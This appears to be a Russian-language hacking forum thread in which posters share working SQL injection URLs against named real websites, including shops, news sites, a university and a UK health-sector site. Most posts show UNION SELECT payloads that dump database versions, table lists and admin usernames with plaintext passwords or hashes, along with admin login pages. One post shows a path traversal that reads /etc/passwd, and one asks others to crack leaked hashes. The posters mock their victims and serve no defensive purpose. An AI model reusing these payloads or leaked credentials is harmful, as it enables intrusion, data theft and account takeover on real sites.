http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,username,2,3,password%20from%20users%20limit%201,1 Хмм.. это не сам facebook.. http://affinispace.com/facebook/
http://www.soulmenace.com Code: http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,3,4,5,6,7-- Версия оказалась 4.0.27-standard и пришлось подбирать вручную. Нашел таблицу prarez_soul.user, в ней подобрал имена: username и password. Вытащил логин с пассом: Code: http://www.soulmenace.com/schedule-detail.php?Id=-1+union+select+1,2,concat_ws(username,0x3a,password),4,5,6,7+from+prarez_soul.user-- prarez : djbamix вход: Code: http://www.soulmenace.com/login.php
Code: http://printer.konicaminoltaeurope.com/be/fr/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user--&PHPSESSID=66fba6d0283e0b2c99df64e3249e6916 логин/пасс: Code: admin:6d8369a953851a24 Code: root:6d8369a953851a24 -------------------------------------------------------- Code: http://www.beethovenmusic.nl/news.php?id=-1+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9+from+user-- логин/пасс: Code: admin:nevets1 -------------------------------------------------------- The End!
http://www.smeda.org/info.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 4.0.17-log - root@localhost - smeda_main01 pr - 5 тИЦ - 20
Code: http://www.e-linebv.nl/news.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user,password),13,14,15,16+from+mysql.user-- логин/пасс: Code: root:05764bd379f12110 --------------------------------------------------------------- Code: http://www.factorydirect.nl/news.php?id=-8+union+select+1,concat_ws(0x3a,log,pass),3,4+from+login-- логин/пасс: Code: tyra:[email protected] --------------------------------------------------------------- Code: http://www.waterpoortboys.nl/news.php?id=-8+union+select+1,concat_ws(0x3a,username,password),3,4+from+admins-- логин/пасс: Code: Alco:da77e9894373dc42c7d83650b5c3f9c2 --------------------------------------------------------------- The End!
www.citymix.ru - интернет-магазин одежды Version: 5.0.27-log User: citymix@localhost Database: citymix
"Аренда интернет магазина" (Не сайт, а одна сплошная дырка) Code: http://www.indsite.ru/index.php?object=magazin&id_content=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- 2-ое поле принтабельно. 5-ая ветка. Админка: Code: http://www.indsite.ru/im_index.php?file=input1.php info41 : 1 Ну и: Code: http://www.indsite.ru/index.php?object=korzina&id0=36687&operation=../../../../../../../../etc/passwd
Помогите, пожалуйста, вынуть логин и пасс юзеров. Вот скуля: Список полей в таблице mtl_users: Дальше пытаюсь вывести содержимое полей вот так: Но ничего не выходит! Вылазит ошибка Что делать? Как просмотреть данные ролей? Пробовал шифровать название таблицы, колонок (на всякий случай), заменять плюсы на просто пробелы и на /**/ - все равно не выводится
И не удивительно, ведь таблица mtl_users - пустая. Code: http://gta.com.ua/file_details.phtml?id=-1+union+select+1,2,3,concat_ws(0x2f,table_name,table_rows),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+36,1--
http://www.lifeskillstraining.com/faq.php?id=-6+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4-- 4.1.20 - [email protected] - nhpa
Code: http://rolemancer.ru/sections.php?op=viewarticle&artid=-666+union+all+select+1,2,concat(name,0x3a,0x3a,pass),4,5,6,7,8,9,10,11,12,13+from+users+limit+0,1/* qwe::qw99ngkCljbZI
Code: http://www.nskfitness.ru/articles.php?cat_id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11 -- 5.0.67:[email protected]:sibdetiru_nskfit
http://www.autobaza.ro/car_details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x3a3a,user,password),24,25+from+users+limit+0,1-- login: andrei pass: andrei17 http://www.autobaza.ro/admin/ Админим ушлепков....
http://www.targetonline.ro/large_picture.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,adminuser_name,adminuser_password,adminuser_level),8+from+adminuser+limit+0,1-- login Liviu pass a http://www.targetonline.ro/admin И еще один гомо-портал )) на закуску
http://www.rochester.edu/news/show.php?id=3136+and+substring(@@version,1,1)=3 - blind sql http://www.rochester.edu/news/show.php?id=3136+and+substring(@@version,1,1)=4 - ошибка
http://www.herpconstrust.org.uk/news/expand-news.php?id=9999%20union%20select%201,2,3,4,version(),6,7,8 http://www.name.net/marketplace/search-domains.php?sub_category=999999%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12,13,14 http://www.name.net/marketplace/search-domains.php?sub_category=999999%20union%20select%201,2,3,4,concat(username,char(0x27),password),6,7,8,9,10,11,12,13,14%20from%20account tbl:account,domain name.net'*F4A92A0B0992BFEB56A81F234194BA8E4A010283 6 purchase | make offer owenb'*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 кто сбрутит пмните мне http://www.asf.ca/news.php?id=9999%20uNion%20select%201,version(),3,4,5,6,7 http://www.atlantasilverbacks.com/news/displaynews.php?id=9999%20union%20select%201,2,version(),4,5,6,7,8,9,10,11,12
http://www.thecorporatelibrary.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,45,32),version(),user(),database()),10,11,12,13,14,15,16,17,18-- 5.0.51b-community-nt - tcorplib@132102-APP1 - tclib Список таблиц из information_schema: ------- 1:CHARACTER_SETS 2:COLLATIONS 3:COLLATION_CHARACTER_SET_APPLICABILITY 4:COLUMNS 5:COLUMN_PRIVILEGES 6:KEY_COLUMN_USAGE 7ROFILING 8:ROUTINES 9:SCHEMATA 10:SCHEMA_PRIVILEGES 11:STATISTICS 12:TABLES 13:TABLE_CONSTRAINTS 14:TABLE_PRIVILEGES 15:TRIGGERS 16:USER_PRIVILEGES 17:VIEWS 18:tcompanies 19:address 20:address2cart 21:calendar_events 22:cart 23:cart_bak 24:cartcc 25:category 26:change_log 27:company_bak 28:info 29:link 30:link_cat 31:news 32:news_categories 33erson 34roduct 35roduct2cart 36roduct2cart_bak 37roduct2category 38roduct_bak 39romotion 40:recommendations 41:site_section 42:state 43:subscription 44:testimonial 45:users 46:users_bak -------------------------------------- http://www.roguegovernment.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10-- 4.1.22-standart - roguegov_publicr@localhost-roguegov_rgov ---------------------------------------- http://www.monitor-nhsft.gov.uk/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 5.0.54 - monitor@localhost - nhsftreg --------------------------------------------------- http://en.apa.az/news.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16-- 5.0.67-community - apaadm_user@localhost - apaadm_en ------------ p.s. спите что ли?инъекций чо т мало выложено за сёдня..